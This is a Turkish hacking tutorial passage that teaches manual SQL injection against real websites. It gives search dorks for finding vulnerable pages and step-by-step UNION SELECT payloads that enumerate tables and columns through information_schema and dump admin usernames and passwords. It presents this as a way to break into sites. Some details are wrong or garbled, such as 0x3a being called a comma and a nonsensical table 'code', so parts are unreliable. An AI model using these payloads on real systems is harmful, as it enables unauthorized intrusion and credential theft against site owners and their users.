şimdide öyle olucak fakat bunları arama yerine yazarak tabloları ve şifreleri görebilicez o zaman başlıyalım...
Pekii ilk önce size şunu sorayım sitede neden açık olur ?
Bazı SQL dilinde yazılmış sitelerde hatalar/Açıklar oluşabilir bunun nedeni web masterlerın yani siteyi yazanların kodda hata yapmış olmalarıdır...
ilk önce SQL açıklı site bulmamız lazım onun içinde bize bazı dorklar lazım bu dorkları aşağıda veriyorum tabiki siz bunları değiştirerek yeni dorklar oluşturabilirsiniz...
DORKLAR :
- wladmin/login.asp
- news.php?id=
- index.php=id=
- news_details.php?id=
- picture.php?id=
- display.php?id=
- item.php?id=
Evet daha sonra sitemizin sonuna order by komutunu ekledik yani kolon sayımızı alıyoruz
mesela siteismi.com/index.php?id=1+order+by+12 yazdık eğer site error veriyorsa 12 değildir
daha küçük bir sayıdır...Mesela 8'e kadar geldik ve site düzeldi kolun sayımız 8 miş şimdi sitenin sonuna union select komutunu yazıcaz siteismi.com/index.php?id=1+union+select+0,1,2,3,4,5,6,7,8--
kolon sayımız 8 olduğu için 8'e kadar yazıyoruz...
ve id=1 in ününe - koyuyoruz böyle olmalı id=-1 siteninde son hali siteismi.com/index.php?id-1+union+select+0,1,2,3,4,5,6,7,8--
bunları yazdıktan sonra karşımıza bir sayı çıkıcak bu sayıda 2 olsun yani 2 yazan yere bunları yazıcaz..group_concat(table_name) url'nin en sonunada +from+information_schema.tables+where+table_schema=database() ve ekranda sayıları gördükten sonra "--" ve "-" işaretlerini silmemiz lazım.
sitemizin son hali böyle olmalı..
siteismi.com/index.php?id=1+union+select+1+group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schema=database()
bunları yazdıktan sonra ekrana tablolar gelicek..siteye girmek istiyorsak bize admin tablosu yada user tablosu lazım.
sitenin sonuna yazdığımız kodu değiştiriyoruz yeni kod böyle olmalı..
siteismi.com/index.php?id=1+union+select+1+group_concat(table_name),3,4,5,6,7+union+select+1,group_concat(column_name),4,5,6,7+from+information_schema.columns+where+table_name=char(table kodu)--
şimdi tabloları hacklemek için bir siteden yardım almamız lazım o sitede https://www.easycalculation.com/ascii-hex.php bu siteye giriyoruz ve hacklemek istediğimiz tablonun ismimi string bölümüne yapıştırıyoruz..mesela tablo ismi admin oraya admin yazıyoruz.
ve bize bir kod veriyor
Kod: 85 156 548 652 gibi ve sitenin sonuna yazıcağımız kod böyle oluyor..
siteismi.com/index.php?id=1+union+select+1+group_concat(user,0x3a,password),3,4,5,6,7+from+admin--
NOT : buradaki 0x3a virgül demek ","..
veee admin bilgileri karşımızda :))
